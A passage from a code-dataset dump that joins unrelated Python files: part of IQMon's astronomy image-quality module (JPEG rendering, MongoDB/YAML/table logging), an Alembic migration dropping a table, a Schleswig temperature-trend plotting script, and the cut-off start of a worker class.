range[1]), size=10)\n if len(residuals) > 20000:\n gridsize = 20\n else:\n gridsize = 10\n pyplot.hexbin(xpix, ypix, residuals,\\\n gridsize=gridsize,\\\n mincnt=5,\\\n vmin=range[0], vmax=range[1],\\\n alpha=0.5,\\\n cmap='Reds')\n pyplot.xlabel('X Pixels', size=10)\n pyplot.ylabel('Y Pixels', size=10)\n pyplot.xlim(0,self.nXPix)\n pyplot.ylim(0,self.nYPix)\n pyplot.xticks(size=10)\n pyplot.yticks(size=10)\n\n pyplot.savefig(self.zero_point_plotfile, dpi=100,\\\n bbox_inches='tight', pad_inches=0.10)\n pyplot.close(fig)\n\n end_time = datetime.datetime.now()\n elapsed_time = end_time - start_time\n self.logger.info(' Done making zero point plot in {:.1f} s'.format(\\\n elapsed_time.total_seconds()))\n\n\n\n ##-------------------------------------------------------------------------\n ## Make JPEG of Image (using matplotlib)\n ##-------------------------------------------------------------------------\n def make_JPEG(self, jpeg_file_name, binning=1, p1=0.15, p2=0.5,\\\n mark_pointing=False,\\\n mark_detected_stars=False,\\\n mark_catalog_stars=False,\\\n mark_saturated=False,\\\n make_hist=False,\\\n transform=None,\n crop=None,\n quality=70,\n ):\n '''\n Make jpegs of image.\n '''\n start_time = datetime.datetime.now()\n self.logger.info('Making jpeg: {}'.format(jpeg_file_name))\n import matplotlib.pyplot as pyplot\n\n jpeg_file = os.path.join(self.tel.plot_file_path, jpeg_file_name)\n\n from PIL import Image, ImageDraw\n import skimage.exposure as skiex\n\n self.logger.debug(' Opening working file')\n with fits.open(self.working_file, ignore_missing_end=True) as hdulist:\n data = hdulist[0].data\n data_zero = np.ma.masked_equal(data, 0)\n data_nonzero = data_zero[~data_zero.mask]\n\n ## Make exposure histogram (of unscaled data)\n if make_hist:\n self.logger.info(' Make histogram of unscaled data.')\n histogram_plot_file = os.path.join(self.tel.plot_file_path,\\\n '{}_hist.png'.format(self.raw_file_basename))\n hist_low = np.percentile(data_nonzero.ravel(), p1)\n hist_high = np.percentile(data_nonzero.ravel(), 100.-p2)\n hist_nbins = 128\n hist_binsize = (hist_high-hist_low)/128\n hist_bins = np.arange(hist_low,hist_high,hist_binsize)\n self.logger.debug(' Histogram range: {} {}.'.format(hist_low, hist_high))\n pyplot.ioff()\n fig = pyplot.figure()\n pyplot.hist(data.ravel(), bins=hist_bins,\\\n label='binsize = {:4f}'.format(hist_binsize))\n pyplot.xlim(hist_low,hist_high)\n pyplot.legend(loc='best')\n pyplot.xlabel('Pixel value')\n pyplot.ylabel('Number of Pixels')\n self.logger.info(' Saving histogram to {}.'.format(histogram_plot_file))\n pyplot.savefig(histogram_plot_file)\n pyplot.close(fig)\n\n ## Rescale data using arcsinh transform for jpeg\n self.logger.debug(' Rescaling image data using arcsinh')\n rescaled_data = np.arcsinh(data_zero)\n rescaled_data = rescaled_data / rescaled_data.max()\n rescaled_data_nonzero = rescaled_data[~rescaled_data.mask]\n low = np.percentile(rescaled_data_nonzero, p1)\n high = np.percentile(rescaled_data_nonzero, 100.-p2)\n self.logger.debug(' Clipping data using {} and {} percentiles.'.format(p1, 100.-p2))\n self.logger.debug(' Clipping data using {} and {} rescaled values.'.format(low, high))\n opt_img = skiex.exposure.rescale_intensity(rescaled_data, in_range=(low,high))\n jpegdata = (opt_img * 255.).astype('uint8')\n\n ## Create PIL Image object\n im = Image.fromarray(jpegdata).convert('RGB')\n draw = ImageDraw.Draw(im)\n\n ## If mark_pointing is set\n if mark_pointing and self.coordinate_from_header and self.image_WCS:\n xy = 
self.image_WCS.wcs_world2pix([[self.coordinate_from_header.ra.degree,\\\n self.coordinate_from_header.dec.degree]], 1)[0]\n x = int(xy[0])\n y = int(xy[1])\n self.logger.debug(' Marking crosshairs at (x, y) = ({}, {})'.format(\\\n im.size[0]/2, im.size[1]/2))\n line_color = 'yellow'\n draw.line((im.size[0]/2+0, 0, im.size[0]/2+0, im.size[1]), fill=line_color)\n draw.line((0, im.size[1]/2+0, im.size[0], im.size[1]/2+0), fill=line_color)\n\n ## Draw Crosshair Over Pointing Location from Header\n self.logger.debug(' Marking pointing at (x, y) = ({}, {})'.format(x, y))\n crosshair_color = 'cyan'\n ms = int((self.tel.pointing_marker_size.to(u.arcsec) / self.tel.pixel_scale).to(u.pix).value)/2\n self.logger.debug(' Pointing marker diameter is {} = {} pix'.format(\\\n self.tel.pointing_marker_size.to(u.arcmin), ms*2))\n thickness = 5\n for i in range(-1*int((thickness-1)/2),int((thickness+1)/2),1):\n draw.line((x-1.5*ms, y+i, x-0.5*ms, y+i), fill=crosshair_color)\n draw.line((x+1.5*ms, y+i, x+0.5*ms, y+i), fill=crosshair_color)\n draw.line((x+i, y-1.5*ms, x+i, y-0.5*ms), fill=crosshair_color)\n draw.line((x+i, y+1.5*ms, x+i, y+0.5*ms), fill=crosshair_color)\n radii = np.linspace(ms, ms+thickness, thickness)\n for r in radii:\n draw.ellipse((x-r, y-r, x+r, y+r), outline=crosshair_color)\n\n ## Mark Catalog Stars\n if mark_catalog_stars and self.catalog_data:\n if self.FWHM:\n ms = max([7, 2.1*math.ceil(self.FWHM.to(u.pix).value)])\n else:\n ms = 7\n circle_color = 'red'\n self.logger.debug(' Marking catalog stars with {} radius {} circles'.format(ms, circle_color))\n\n for star in self.catalog_data:\n xy = self.image_WCS.wcs_world2pix([[float(star['RA']), float(star['Dec'])]], 1)[0]\n x = int(xy[0])\n y = int(xy[1])\n thickness = 2\n radii = np.linspace(ms, ms+thickness, 1)\n for r in radii:\n draw.ellipse((x-r, y-r, x+r, y+r), outline=circle_color)\n\n ## Mark Detected Stars\n if mark_detected_stars and self.SExtractor_results:\n if self.FWHM:\n ms = max([6, 2*math.ceil(self.FWHM.to(u.pix).value)])\n else:\n ms = 6\n circle_color = 'green'\n self.logger.debug(' Marking detected stars with {} radius {} circles'.format(ms, circle_color))\n for star in self.SExtractor_results:\n x = star['XWIN_IMAGE']\n y = star['YWIN_IMAGE']\n thickness = 2\n radii = np.linspace(ms, ms+thickness, 1)\n for r in radii:\n draw.ellipse((x-r, y-r, x+r, y+r), outline=circle_color)\n\n ## Flag Saturated Pixels\n if mark_saturated and self.tel.saturation:\n saturated_color = 'red'\n with fits.open(self.working_file, ignore_missing_end=True) as hdulist:\n data_raw = hdulist[0].data\n data_saturated = np.ma.masked_greater(data_raw, self.tel.saturation)\n indices = np.where(data_saturated.mask == 1)\n if len(indices) > 4:\n xy = zip(indices[1], indices[0])\n draw.point(xy, fill=saturated_color)\n\n ## Flip JPEG to account for difference in origins of FITS and jpg images\n im = im.transpose(Image.FLIP_TOP_BOTTOM)\n \n ## Flip JPG if requested\n if transform:\n self.logger.debug(' Transforming (flipping/rotating) jpeg: {}'.format(transform))\n if transform == 'flip_vertical':\n im = im.transpose(Image.FLIP_TOP_BOTTOM)\n elif transform == 'flip_horizontal':\n im = im.transpose(Image.FLIP_LEFT_RIGHT)\n elif transform == 'rotate90':\n im = im.transpose(Image.ROTATE_90)\n elif transform == 'rotate180':\n im = im.transpose(Image.ROTATE_180)\n elif transform == 'rotate270':\n im = im.transpose(Image.ROTATE_270)\n else:\n self.logger.warning(' Transform \"{}\" not understood.'.format(transform))\n self.logger.warning(' No transform 
performed.'.format(transform))\n\n ## If crop is set\n if crop:\n if len(crop) == 4:\n self.logger.debug(' Cropping image to {}'.format(crop))\n im = im.crop(crop)\n\n ## If binning is set create thumbnail\n if binning > 1:\n size = (int(data.shape[0]/binning), int(data.shape[1]/binning))\n self.logger.debug(' Resizing image by binning factor of {}'.format(binning))\n im.thumbnail(size, Image.ANTIALIAS)\n\n ## Save to JPEG\n self.logger.debug(' Saving jpeg (p1={:.1f}, p2={:.1f}), bin={}, q={:.0f}) to: {}'.format(\\\n p1, p2, binning, quality, jpeg_file_name))\n im.save(jpeg_file, 'JPEG', quality=quality)\n self.jpeg_file_names.append(jpeg_file_name)\n\n end_time = datetime.datetime.now()\n elapsed_time = end_time - start_time\n self.logger.info(' Done making JPEG in {:.1f} s'.format(\\\n elapsed_time.total_seconds()))\n\n\n ##-------------------------------------------------------------------------\n ## Clean Up by Deleting Temporary Files\n ##-------------------------------------------------------------------------\n def clean_up(self):\n '''\n Clean up by deleting temporary files.\n '''\n self.logger.info(\"Cleaning Up Temporary Files.\")\n for item in self.temp_files:\n if os.path.exists(item):\n self.logger.debug(\" Deleting {0}\".format(item))\n os.remove(item)\n\n\n ##-------------------------------------------------------------------------\n ## Append Line With Image Info to YAML Text File\n ##-------------------------------------------------------------------------\n def add_mongo_entry(self):\n assert self.tel.mongo_address\n assert self.tel.mongo_port\n assert self.tel.mongo_db\n assert self.tel.mongo_collection\n address = self.tel.mongo_address\n port = self.tel.mongo_port\n db_name = self.tel.mongo_db\n collection_name = self.tel.mongo_collection\n ## Connect to mongo database\n self.logger.info('Writing results to mongo db at {}:{}'.format(address, port))\n try:\n client = MongoClient(address, port)\n self.logger.debug(' Connected to client')\n except:\n self.logger.warning(' Failed to connect to client')\n return False\n\n try:\n db = client[db_name]\n self.logger.debug(' Connected to database: {}'.format(db_name))\n except:\n self.logger.warning(' Failed to connect to database')\n return False\n\n try:\n data = db[collection_name]\n self.logger.debug(' Found collection: {}'.format(collection_name))\n except:\n self.logger.warning(' Failed to find collection')\n return False\n\n\n ## Form datum to add\n ## Form dictionary with new result info\n new_result = {}\n try:\n new_result['filename'] = str(self.raw_file_name)\n self.logger.debug(' Result: filename = {}'.format(new_result['filename']))\n except: self.logger.warning(' Could not write filename to result')\n\n try:\n new_result['target name'] = str(self.object_name)\n self.logger.debug(' Result: target name = {}'.format(new_result['target name']))\n except: self.logger.warning(' Could not write target name to result')\n\n try:\n new_result['target RA'] = self.coordinate_from_header.to_string('hmsdms', sep=':').split()[0]\n new_result['target Dec'] = self.coordinate_from_header.to_string('hmsdms', sep=':').split()[1]\n self.logger.debug(' Result: target RA = {}'.format(new_result['target RA']))\n self.logger.debug(' Result: target Dec = {}'.format(new_result['target Dec']))\n except: self.logger.warning(' Could not write target RA and Dec to result')\n\n try:\n new_result['exposure time'] = self.exptime.value\n self.logger.debug(' Result: exposure time = {}'.format(new_result['exposure time']))\n except: 
self.logger.warning(' Could not write exposure time to result')\n\n try:\n new_result['filter'] = str(self.filter)\n self.logger.debug(' Result: filter = {}'.format(new_result['filter']))\n except: self.logger.warning(' Could not write filter to result')\n\n try:\n new_result['WCS RA'] = self.coordinate_of_center_pixel.to_string(\\\n 'hmsdms', sep=':', precision=1).split()[0]\n new_result['WCS Dec'] = self.coordinate_of_center_pixel.to_string(\\\n 'hmsdms', sep=':', precision=0).split()[1]\n self.logger.debug(' Result: WCS RA = {}'.format(new_result['WCS RA']))\n self.logger.debug(' Result: WCS Dec = {}'.format(new_result['WCS Dec']))\n except: self.logger.warning(' Could not write WCS RA and Dec to result')\n\n try:\n wcs_header = self.image_WCS.to_header()\n new_result['CRPIX1'] = wcs_header['CRPIX1']\n new_result['CRPIX2'] = wcs_header['CRPIX2']\n new_result['CRVAL1'] = wcs_header['CRVAL1']\n new_result['CRVAL2'] = wcs_header['CRVAL2']\n new_result['PC1_1'] = wcs_header['PC1_1']\n new_result['PC2_2'] = wcs_header['PC2_2']\n self.logger.debug(' Result: WCS CRPIX1 = {}'.format(new_result['CRPIX1']))\n self.logger.debug(' Result: WCS CRPIX2 = {}'.format(new_result['CRPIX2']))\n self.logger.debug(' Result: WCS CRVAL1 = {}'.format(new_result['CRVAL1']))\n self.logger.debug(' Result: WCS CRVAL2 = {}'.format(new_result['CRVAL2']))\n self.logger.debug(' Result: WCS PC1_1 = {}'.format(new_result['PC1_1']))\n self.logger.debug(' Result: WCS PC2_2 = {}'.format(new_result['PC2_2']))\n if 'PC1_2' in wcs_header.keys():\n new_result['PC1_2'] = wcs_header['PC1_2']\n self.logger.debug(' Result: WCS PC1_2 = {}'.format(new_result['PC1_2']))\n if 'PC2_1' in wcs_header.keys():\n new_result['PC2_1'] = wcs_header['PC2_1']\n self.logger.debug(' Result: WCS PC2_1 = {}'.format(new_result['PC2_1']))\n except:\n self.logger.warning(' Could not write WCS values to result')\n if self.image_WCS:\n for entry in self.image_WCS.to_header():\n self.logger.debug('{} {}'.format(entry, self.image_WCS.to_header()[entry]))\n else:\n self.logger.debug('No WCS read from header')\n\n try:\n obsdt = datetime.datetime.strptime(str(self.observation_date), '%Y-%m-%dT%H:%M:%S')\n new_result['date'] = obsdt.strftime('%Y%m%dUT')\n new_result['time'] = obsdt.strftime('%H:%M:%S')\n new_result['exposure start'] = obsdt\n self.logger.debug(' Result: date = {}'.format(new_result['date']))\n self.logger.debug(' Result: time = {}'.format(new_result['time']))\n except: self.logger.warning(' Could not write date and time to result')\n\n try:\n new_result['FWHM pix median'] = float(self.FWHM_median.to(u.pix).value)\n self.logger.debug(' Result: FWHM pix median = {}'.format(new_result['FWHM pix median']))\n except: self.logger.warning(' Could not write FWHM pix median to result')\n\n try:\n new_result['FWHM pix mode'] = float(self.FWHM_mode.to(u.pix).value)\n self.logger.debug(' Result: FWHM pix mode = {}'.format(new_result['FWHM pix mode']))\n except: self.logger.warning(' Could not write FWHM pix mode to result')\n\n try:\n new_result['FWHM pix'] = float(self.FWHM.to(u.pix).value)\n self.logger.debug(' Result: FWHM pix = {}'.format(new_result['FWHM pix']))\n except: self.logger.warning(' Could not write FWHM pix to result')\n\n try:\n new_result['ellipticity median'] = float(self.ellipticity_median)\n self.logger.debug(' Result: ellipticity median = {}'.format(new_result['ellipticity median']))\n except: self.logger.warning(' Could not write ellipticity median to result')\n\n try:\n new_result['ellipticity mode'] = 
float(self.ellipticity_mode)\n self.logger.debug(' Result: ellipticity mode = {}'.format(new_result['ellipticity mode']))\n except: self.logger.warning(' Could not write ellipticity mode to result')\n\n try:\n new_result['ellipticity'] = float(self.ellipticity)\n self.logger.debug(' Result: ellipticity = {}'.format(new_result['ellipticity']))\n except: self.logger.warning(' Could not write ellipticity to result')\n\n try:\n new_result['n_stars'] = int(self.n_stars_SExtracted)\n self.logger.debug(' Result: n_stars = {}'.format(new_result['n_stars']))\n except: self.logger.warning(' Could not write n_stars to result')\n\n try:\n new_result['background'] = float(self.SExtractor_background)\n self.logger.debug(' Result: background = {}'.format(new_result['background']))\n except: self.logger.warning(' Could not write background to result')\n\n try:\n new_result['background RMS'] = float(self.SExtractor_background_RMS)\n self.logger.debug(' Result: background RMS = {}'.format(new_result['background RMS']))\n except: self.logger.warning(' Could not write background RMS to result')\n\n try:\n new_result['pointing error arcmin'] = float(self.pointing_error.arcminute)\n self.logger.debug(' Result: pointing error arcmin = {}'.format(new_result['pointing error arcmin']))\n except: self.logger.warning(' Could not write pointing error arcmin to result')\n\n if self.zero_point:\n try:\n new_result['zero point'] = float(self.zero_point.value)\n self.logger.debug(' Result: zero point = {}'.format(new_result['zero point']))\n except: self.logger.warning(' Could not write zero point to result')\n\n try:\n new_result['alt'] = float(self.target_alt.to(u.deg).value)\n self.logger.debug(' Result: alt = {}'.format(new_result['alt']))\n except: self.logger.warning(' Could not write alt to result')\n\n try:\n new_result['az'] = float(self.target_az.to(u.deg).value)\n self.logger.debug(' Result: az = {}'.format(new_result['az']))\n except: self.logger.warning(' Could not write az to result')\n\n try:\n new_result['airmass'] = float(self.airmass)\n self.logger.debug(' Result: airmass = {}'.format(new_result['airmass']))\n except: self.logger.warning(' Could not write airmass to result')\n\n try:\n new_result['moon separation'] = float(self.moon_sep.to(u.deg).value)\n self.logger.debug(' Result: moon separation = {}'.format(new_result['moon separation']))\n except: self.logger.warning(' Could not write moon separation to result')\n\n try:\n new_result['moon illumination'] = float(self.moon_phase)\n self.logger.debug(' Result: moon illumination = {}'.format(new_result['moon illumination']))\n except: self.logger.warning(' Could not write moon illumination to result')\n\n try:\n new_result['moon alt'] = float(self.moon_alt.value)\n self.logger.debug(' Result: moon alt = {}'.format(new_result['moon alt']))\n except: self.logger.warning(' Could not write moon alt to result')\n\n if self.position_angle:\n try:\n new_result['WCS position angle'] = float(self.position_angle.to(u.deg).value)\n self.logger.debug(' Result: WCS_position_angle = {}'.format(new_result['WCS position angle']))\n except: self.logger.warning(' Could not write WCS position angle to result')\n\n try:\n new_result['flags'] = self.flags\n self.logger.debug(' Result: flags = {}'.format(new_result['flags']))\n except: self.logger.warning(' Could not write flags to result')\n\n try:\n new_result['IQMon Version'] = str(__version__)\n self.logger.debug(' Result: IQMon Version = {}'.format(new_result['IQMon Version']))\n except: self.logger.warning(' Could not 
write IQMon Version to result')\n\n try:\n new_result['IQMon processing time'] = float(self.total_process_time)\n self.logger.debug(' Result: IQMon processing time = {}'.format(new_result['IQMon processing time']))\n except: self.logger.warning(' Could not write IQMon processing time to result')\n\n try:\n new_result['IQMon start time'] = self.start_process_time + datetime.timedelta(0, 60*60*10)\n self.logger.debug(' Result: IQMon Start Time = {}'.format(\\\n new_result['IQMon start time'].strftime('%Y%m%d %H:%M:%S')))\n except: self.logger.warning(' Could not write IQMon start time to result')\n\n new_result['jpegs'] = self.jpeg_file_names\n self.logger.debug(' Result: IQMon JPEGs = {}'.format(new_result['jpegs']))\n\n if self.PSF_plot_file:\n new_result['PSF plot'] = os.path.split(self.PSF_plot_file)[1]\n else:\n new_result['PSF plot'] = ''\n self.logger.debug(' Result: IQMon PSF Plot = {}'.format(new_result['PSF plot']))\n\n if self.zero_point_plotfile:\n new_result['ZP plot'] = os.path.split(self.zero_point_plotfile)[1]\n else:\n new_result['ZP plot'] = ''\n self.logger.debug(' Result: IQMon ZP Plot = {}'.format(new_result['ZP plot']))\n\n ## Check if this image is already in the collection\n matches = [item for item in data.find( {\"filename\" : new_result['filename']} )]\n\n ## Add datum to collection\n try:\n id = data.insert(new_result)\n self.logger.debug(' Inserted document with ID: {}'.format(id))\n self.logger.debug(' Found {} previous entries. Deleting old entries.'.format(\\\n len(matches)))\n for match in matches:\n data.remove( {\"_id\" : match[\"_id\"]} )\n self.logger.debug(' Removed \"_id\": {}'.format(match[\"_id\"]))\n except:\n self.logger.warning(' Failed to insert document')\n return False\n\n return True\n\n\n\n ##-------------------------------------------------------------------------\n ## Append Line With Image Info to YAML Text File\n ##-------------------------------------------------------------------------\n def add_yaml_entry(self, summary_file):\n self.logger.info(\"Writing YAML Summary File: {}\".format(summary_file))\n result_list = []\n if os.path.exists(summary_file):\n self.logger.debug(' Reading existing summary file.')\n with open(summary_file, 'r') as yaml_string:\n result_list = yaml.load(yaml_string)\n ## Form dictionary with new result info\n try:\n FWHM_median_pix = self.FWHM_median.to(u.pix).value\n except:\n FWHM_median_pix = None\n try:\n FWHM_mode_pix = self.FWHM_mode.to(u.pix).value\n except:\n FWHM_mode_pix = None\n try:\n FWHM_pix = self.FWHM.to(u.pix).value\n except:\n FWHM_pix = None\n try:\n pointing_error_arcmin = self.pointing_error.arcminute\n except:\n pointing_error_arcmin = None\n try:\n alt = self.target_alt.to(u.deg).value\n except:\n alt = None\n try:\n az = self.target_az.to(u.deg).value\n except:\n az = None\n try:\n moon_sep = self.moon_sep.to(u.deg).value\n except:\n moon_sep = None\n try:\n posang = self.position_angle.to(u.deg).value\n except:\n posang = None\n new_result = {\n 'filename': self.raw_file_name,\\\n 'exposure_start': self.observation_date,\\\n 'FWHM_median_pix': str(FWHM_median_pix),\\\n 'FWHM_mode_pix': str(FWHM_mode_pix),\\\n 'FWHM_pix': str(FWHM_pix),\\\n 'ellipticity_median': str(self.ellipticity_median),\\\n 'ellipticity_mode': str(self.ellipticity_mode),\\\n 'ellipticity': str(self.ellipticity),\\\n 'n_stars': str(self.n_stars_SExtracted),\\\n 'background': str(self.SExtractor_background),\\\n 'background_rms': str(self.SExtractor_background_RMS),\\\n 'pointing_error_arcmin': 
str(pointing_error_arcmin),\\\n 'zero_point': str(self.zero_point.value),\\\n 'alt': str(alt),\\\n 'az': str(az),\\\n 'airmass': str(self.airmass),\\\n 'moon_separation': str(moon_sep),\\\n 'moon_illumination': str(self.moon_phase),\\\n 'WCS_position_angle': str(posang),\\\n 'process_time': str(self.total_process_time),\\\n 'flags': str(self.flags),\\\n 'IQMon Version': str(__version__),\\\n }\n result_list.append(new_result)\n yaml_string = yaml.dump(result_list)\n with open(summary_file, 'w') as output:\n output.write(yaml_string)\n\n\n ##-------------------------------------------------------------------------\n ## Append Line With Image Info to Summary Text File\n ##-------------------------------------------------------------------------\n def add_summary_entry(self, summaryFile):\n self.logger.info(\"Writing Summary File Entry.\")\n self.logger.debug(\" Summary File: {0}\".format(summaryFile))\n ## Read in previous data\n if not os.path.exists(summaryFile):\n self.logger.debug(\" Making new astropy table object\")\n SummaryTable = table.Table(names=(\"ExpStart\", \"File\", \"FWHM (pix)\", \"Ellipticity\",\\\n \"Alt (deg)\", \"Az (deg)\", \"Airmass\", \"pointing_error (arcmin)\", \\\n \"ZeroPoint\", \"nStars\", \"Background\", \"Background RMS\"),\\\n dtype=('S22', 'S100', 'f4', 'f4', 'f4', 'f4',\\\n 'f4', 'f4', 'f4', 'i4', 'f4', 'f4'),\\\n masked=True)\n else:\n self.logger.debug(\" Reading astropy table object from file: {0}\".format(\\\n summaryFile))\n try:\n SummaryTable = ascii.read(summaryFile, guess=False,\n header_start=0, data_start=1,\n Reader=ascii.basic.Basic,\n delimiter=\"\\s\",\n fill_values=('--', '0'),\n converters={\n 'ExpStart': [ascii.convert_numpy('S22')],\n 'File': [ascii.convert_numpy('S100')],\n 'FWHM (pix)': [ascii.convert_numpy('f4')],\n 'Ellipticity': [ascii.convert_numpy('f4')],\n 'Alt (deg)': [ascii.convert_numpy('f4')],\n 'Az (deg)': [ascii.convert_numpy('f4')],\n 'Airmass': [ascii.convert_numpy('f4')],\n 'pointing_error (arcmin)': [ascii.convert_numpy('f4')],\n 'ZeroPoint': [ascii.convert_numpy('f4')],\n 'nStars': [ascii.convert_numpy('i4')],\n 'Background': [ascii.convert_numpy('f4')],\n 'Background RMS': [ascii.convert_numpy('f4')]\n })\n except:\n self.logger.critical(\"Failed to read summary file: {0} {1} {2}\".format(\\\n sys.exc_info()[0], sys.exc_info()[1], sys.exc_info()[2]))\n ## Astropy table writer can not write None to table initialized\n ## with type. 
If any outputs are None, change to some value.\n tableMask = np.zeros(12)\n ## observation_date\n if self.observation_date: observation_date = self.observation_date\n else: \n observation_date = \"\"\n tableMask[0] = True\n ## FileName\n if self.raw_file_name: raw_file_name = self.raw_file_name\n else: \n raw_file_name = \"\"\n tableMask[1] = True\n ## FWHM\n if self.FWHM: FWHM = self.FWHM.to(u.pix).value\n else:\n FWHM = 0.\n tableMask[2] = True\n ## Ellipticity\n if self.ellipticity: ellipticity = self.ellipticity\n else:\n ellipticity = 0.\n tableMask[3] = True\n ## Target Alt\n if self.target_alt: target_alt = self.target_alt.to(u.deg).value\n else:\n target_alt = 0.\n tableMask[4] = True\n ## Target Az\n if self.target_az: target_az = self.target_az.to(u.deg).value\n else:\n target_az = 0.\n tableMask[5] = True\n ## Airmass\n if self.airmass: airmass = self.airmass\n else:\n airmass = 0.\n tableMask[6] = True\n ## Pointing Error\n if self.pointing_error: pointing_error = self.pointing_error.arcminute\n else:\n pointing_error = 0.\n tableMask[7] = True\n ## Zero Point\n if self.zero_point: zeroPoint = self.zero_point.value\n else:\n zeroPoint = 0.\n tableMask[8] = True\n ## n_stars_SExtracted\n if self.n_stars_SExtracted: n_stars_SExtracted = self.n_stars_SExtracted\n else: \n n_stars_SExtracted = 0.\n tableMask[9] = True\n ## SExtractor Background\n if self.SExtractor_background: SExtractor_background = self.SExtractor_background\n else:\n SExtractor_background = 0.\n tableMask[10] = True\n ## SExtractor Background RMS\n if self.SExtractor_background_RMS: SExtractor_background_RMS = self.SExtractor_background_RMS\n else:\n SExtractor_background_RMS = 0.\n tableMask[11] = True\n ## Add row to table\n self.logger.debug(\" Writing new row to log table. Filename: {0}\".format(raw_file_name))\n SummaryTable.add_row((observation_date, raw_file_name,\n FWHM, ellipticity,\n target_alt, target_az,\n airmass, pointing_error,\n zeroPoint, n_stars_SExtracted,\n SExtractor_background, SExtractor_background_RMS),\n mask=tableMask)\n ## Write Table to File\n self.logger.debug(\" Writing new summary file.\")\n ascii.write(SummaryTable, summaryFile,\n Writer=ascii.basic.Basic)\n\n\n ##-------------------------------------------------------------------------\n ## Calcualte Process Time\n ##-------------------------------------------------------------------------\n def calculate_process_time(self):\n '''\n Determine how long it took for IQMon to process this image. 
Determined\n by subtracting the starting time (determined on the initialization of \n the image object) to the ending time (determined by this method).\n '''\n self.end_process_time = datetime.datetime.now()\n self.total_process_time = (self.end_process_time - self.start_process_time).total_seconds()\n self.logger.info(\"IQMon processing time = {0:.1f} seconds\".format(self.total_process_time))\n\n","repo_name":"mwcraig/IQMon","sub_path":"IQMon.py","file_name":"IQMon.py","file_ext":"py","file_size_in_byte":157507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"10070645783","text":"\"\"\"Removed runtime_type table\n\nRevision ID: e60f8742b969\nRevises: 84e857000376\nCreate Date: 2022-12-12 12:25:38.278913\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import mysql\n\n# revision identifiers, used by Alembic.\nrevision = 'e60f8742b969'\ndown_revision = '84e857000376'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_index('ix_runtime_type_scale_type', table_name='runtime_type')\n op.drop_index('ix_runtime_type_spec_name', table_name='runtime_type')\n op.drop_index('ix_runtime_type_spec_version', table_name='runtime_type')\n op.drop_table('runtime_type')\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('runtime_type',\n sa.Column('spec_name', mysql.VARCHAR(length=255), nullable=False),\n sa.Column('spec_version', mysql.INTEGER(), autoincrement=False, nullable=False),\n sa.Column('scale_type', mysql.VARCHAR(length=512), nullable=False),\n sa.Column('decoder_class', mysql.VARCHAR(length=255), nullable=True),\n sa.Column('is_core_primitive', mysql.TINYINT(display_width=1), autoincrement=False, nullable=True),\n sa.Column('is_runtime_primitive', mysql.TINYINT(display_width=1), autoincrement=False, nullable=True),\n sa.PrimaryKeyConstraint('spec_name', 'spec_version', 'scale_type'),\n mysql_collate='utf8mb4_0900_ai_ci',\n mysql_default_charset='utf8mb4',\n mysql_engine='InnoDB'\n )\n op.create_index('ix_runtime_type_spec_version', 'runtime_type', ['spec_version'], unique=False)\n op.create_index('ix_runtime_type_spec_name', 'runtime_type', ['spec_name'], unique=False)\n op.create_index('ix_runtime_type_scale_type', 'runtime_type', ['scale_type'], unique=False)\n # ### end Alembic commands ###\n","repo_name":"polkascan/harvester","sub_path":"db/versions/e60f8742b969_removed_runtime_type_table.py","file_name":"e60f8742b969_removed_runtime_type_table.py","file_ext":"py","file_size_in_byte":1865,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"53"} +{"seq_id":"14285187144","text":"import os, numpy as np\nimport pandas as pd\nfrom matplotlib import pyplot as plt\nhomedir = os.getenv('HOME')\n\ndatapath = os.path.join(homedir, 'Dokumente','python-apps','tensorflow', 'eu_air_pollution_data')\ndatafile = 'Schleswig_Klima_Tag_hist.txt'\n\nindatapath = os.path.join(datapath,datafile)\n\ndf = pd.read_csv(indatapath, header=0, sep=';',usecols=[1,13], names=['Datum', 'daytempmean'])\ndf['dt'] = pd.to_datetime(df.Datum, format='%Y%m%d')\ndf.drop(columns='Datum', inplace=True)\ndf['year'] = df['dt'].dt.year\ndf.sort_values(by=['dt'], ascending=[True], inplace=True, axis=0)\n# Deal with missings:\nmis = df.loc[(df.daytempmean == -999)]\n#print(len(mis)) No missings in the data\ndf2 = 
pd.DataFrame()\ndf2['av_temp_year'] = df.groupby(['year'], sort=False, as_index=True).daytempmean.mean()\nprint(df2)\n\n\nfig, ax = plt.subplots(figsize=[10,7.5])\nax.scatter(df2.index, df2.av_temp_year, color='b')\n\nax.set_xlim(1947, 2018)\nax.tick_params(labelsize=18)\n\nax.set_title('Mean annual temperature (°celsius) in city Schleswig', fontsize='xx-large')\nax.legend(loc=3, prop={'size': 18})\nax.grid(True)\n\nplt.xlabel('1947 - 2018', fontsize='xx-large')\nplt.ylabel('Temp. [°Celsius]', fontsize='xx-large')\nfig.autofmt_xdate(rotation=30)\nplt.savefig('Schleswig_temperature_historical.png', dpi=None, facecolor='w', edgecolor='w',\n orientation='landscape', format='png')\n\n\n\n# do linear regression:\nimport statsmodels.api as sm\nx = np.arange(1, len(df2.index)+1)\ny = df2.av_temp_year # response\nX = x # predictor\nX = sm.add_constant(X) # Adds a constant term to the predictor\nmodel = sm.OLS(y, X).fit()\ndf2['predicted'] = model.predict(X)\n\nfig, ax = plt.subplots(figsize=[10,7.5])\nax.plot(df2.index, df2['predicted'], label='Trend (linear regression)', color='red')\nax.scatter(df2.index, df2.av_temp_year, color='grey')\n\nax.set_xlim(1947, 2018)\nax.tick_params(labelsize=18)\n\nax.set_title('Mean annual temperature in city Schleswig', fontsize='xx-large')\nax.legend(loc=3, prop={'size': 18})\nax.grid(True)\n\nplt.xlabel('1947 - 2018', fontsize='xx-large')\nplt.ylabel('Temperature (°Celsius)', fontsize='xx-large')\nfig.autofmt_xdate(rotation=30)\nplt.savefig('Schleswig_temperature_historical2.png', dpi=None, facecolor='w', edgecolor='w',\n orientation='landscape', format='png')\n\n\n","repo_name":"DirkEngfer/PandasTests","sub_path":"Schleswig_temperature_hist.py","file_name":"Schleswig_temperature_hist.py","file_ext":"py","file_size_in_byte":2276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24601826788","text":"import os\nimport os.path\nimport scorer\nimport backenddb as bdb\n\nclass Worker:\n def __init__(self, app):\n self.db = 